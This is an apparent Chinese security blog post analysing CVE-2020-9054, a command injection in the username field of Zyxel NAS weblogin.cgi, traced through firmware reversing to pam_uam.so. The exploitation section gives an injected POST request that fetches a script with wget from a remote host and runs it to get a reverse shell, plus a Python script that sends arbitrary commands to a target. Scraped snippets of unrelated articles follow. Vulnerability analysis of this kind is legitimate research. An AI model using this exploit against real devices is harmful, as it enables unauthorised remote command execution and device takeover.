<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    zyxel nas CVE-2020-9054 漏洞分析

    VSole2021-10-26 16:17:28

     一.漏洞概述

    CVE-2020-9054是由于可執行文件weblogin.cgi在身份驗證期間未正確過濾username參數造成的,導致攻擊者可以在傳遞給此文件的用戶名中包含某些特殊字符來觸發漏洞,進而以webserver的權限實現命令注入。

    二.漏洞分析

    官網下載Zyxel NAS326_V5.21(AAZF.0)C0版本固件,使用binwalk直接解包即可,定位到weblogin.cgi,使用ida打開ext-root-bin.cgi

    通過

    gcgiFetchStringNext("username", username, 63)
    

    獲取用戶名,長度63(不知道輸入超過63個行不行) 然后進入

     if ( user_auth(username, (int)password, (int)remote_addr, (int)v18, nptr, v8) >= 0 )// pam_authenticate()
    

    調用

    v20 = pam_authenticate(v18, 0x8000);
    

    查找 pam_sm_authenticate() 函數

    ubuntu@ubuntu:~/Desktop/zyxel/nas/NAS326_V5.21(AAZF.0)C0/_521AAZF0C0.bin.extracted/_71BEA9.extracted/ext-root$ grep "pam_sm_authenticate" -rBinary file usr/lib/libpam.so.0.83.1 matchesBinary file lib/security/pam_pidhome.so matchesBinary file lib/security/pam_auth_admin.so matchesBinary file lib/security/pam_guestok.so matchesBinary file lib/security/pam_cloud_step2.so matchesBinary file lib/security/pam_smbpass.so matchesBinary file lib/security/pam_nologin.so matches***Binary file lib/security/pam_uam.so matches***Binary file lib/security/pam_cloud_step1.so matches
    定位文件lib/security/pam_uam.so,ida打開如下:
    

    snprinf() 格式化username時,未作過濾,導致命令注入

    三.漏洞利用

    由于漏洞執行命令不能回顯,使用下載執行,進行反彈:

    POST http://ip/adv./cgi-bin/weblogin.cgi?username=admin';cd /tmp;wget http://xxx.xxx.xxx.xxx/re;sh re #&password=aaa
    import requestsimport sysfrom requests.packages.urllib3.exceptions import InsecureRequestWarningrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    def exec_command(url, command):    injection = "admin';%s #" %(command)    data = {"password": "asdf",            "username": injection}    try:        r = requests.post(url=url, data=data, verify=False)    except Exception as e:        print (e)    print(r.text)
    if __name__ == "__main__":    target = "https://x.x.x.x/r51201,/desktop,/cgi-bin/weblogin.cgi"    #for test    cmd ="wget x.x.x.x;"    exec_command(target, cmd)
    

    有些網站的目錄不一定時/adv./,需要自己登錄訪問觀察下。

    四.補丁對比

     參考

    請及時更新固件!能利用CVE-2020-9054的Mirai新變種來襲:

    https://www.6cu.com/seoxuetang/kj/2020/0328/47808.html

    PAM詳解:

    http://blog.chinaunix.net/uid-29479952-id-5761558.html

    poc test: https://kb.cert.org/artifacts/cve-2020-9054.html

    lib文件lib
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    lib文件在windows下有兩種形式出現,第一種就是普通的靜態庫,第二種是作為dll的導入庫。接下來我來分享一下如何在這兩種lib文件中注入后門代碼,使程序編譯后生成的exe在運行時候自動。執行我們后門,并且不影響正常lib的功能。lib實際上就是一堆Obj文件打包在了一起,當然還有一些額外的信息,這個之后再說。
    據我們所知,普通的WP File Manager和WP File Manager Pro版本均受到影響。該修復程序已在同一天發布,并且WP File Manager插件版通過刪除允許未經授權的文件上傳訪問的端點來解決當前問題。通過選擇良好的服務提供商,HTTPS的使用將包括在內,而無需支付任何額外費用,并且默認情況下處于啟用狀態。WordPress的統計數據表明,目前約有52%的安裝易受攻擊。由于File Manager的700,000個站點中已安裝的漏洞中有一半以上,因此損壞的可能性很高。
    依賴于特定硬件環境的固件無法完整模擬,需要hook掉其中依賴于硬件的函數。LD_PRELOAD的劫持對于特定函數的劫持技術分為動態注入劫持和靜態注入劫持兩種。網上針對LD_PRELOAD的劫持也有大量的描述
    x64dbg插件編寫基礎
    2023-04-13 09:28:19
    ② 腳本DLL,就是編寫一個DLL導出 AsyncStart() or Start(),然后通過命令scriptdll/dllscript來加載DLL執行代碼。在x64dbg的文檔中并沒有說明 "插件" 到底是一個什么東西,只是說插件的后綴名叫dp32或者dp64,通過觀察其他的插件發現其實就是DLL,只不過是導出了一些指定函數的DLL。本文的目的就是說明編寫x64dbg插件的步驟,然后編寫一個簡單的x64dbg插件。
    Linux是目前應用最廣泛的服務器操作系統,基于Unix,開源免費,由于系統的穩定性和安全性,市場占有率很高,幾乎成為程序代碼運行的最佳系統環境。linux不僅可以長時間的運行我們編寫的程序代碼,還可以安裝在各種計算機硬件設備中,如手機、路由器等,Android程序最底層就是運行在linux系統上的。
    CVE-2020-9054是由于可執行文件weblogin.cgi在身份驗證期間未正確過濾username參數造成的。
    file=2663◆測試環境:Ubuntu 18.04根據漏洞描述可得到幾個關鍵詞:遠程命令執行、/lan.jsp頁面、Device Name 參數、HTTP、POST、get set cpp。這里應該是一個POST請求提交數據。在文件系統中查找關鍵詞并沒有發現名為“get_set.ccp”的文件,沒有“get_set.ccp”文件,這個URL應該是交給后端處理,處理好之后將結果返回給用戶。在復現這個漏洞中發現2022年剛披露的信息和2023年有所不同,2022年的描述更具體,2023的變得模糊一些。剛開始以為是為了保護廠商,避免提示太明顯容易被利用。
    WEB安全梳理-操作系統
    2022-08-10 07:16:03
    WEB安全梳理-操作系統
    前言隨著前端技術的發展,業界涌現出了許多的UI組件庫。例如我們熟知的ElementUI,Vant,AntDesign等等。本文將使用Vue3和TypeScript來編寫一個組件庫,使用Vite+Vue3來對這個組件庫中的組件進行調試,最后使用vite來對組件庫進行打包并且發布到npm上。最終的產物是一個名為kitty-ui的組件庫。
    IDA Pro是反匯編程序 反匯編程序用于將機器代碼轉換為人類可讀的格式,稱為匯編語言。我們每天使用的軟件的源代碼并不總是可用。像IDA Pro這樣的反匯編程序能夠創建其執行的映射,以顯示處理器實際以稱為匯編語言的...
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类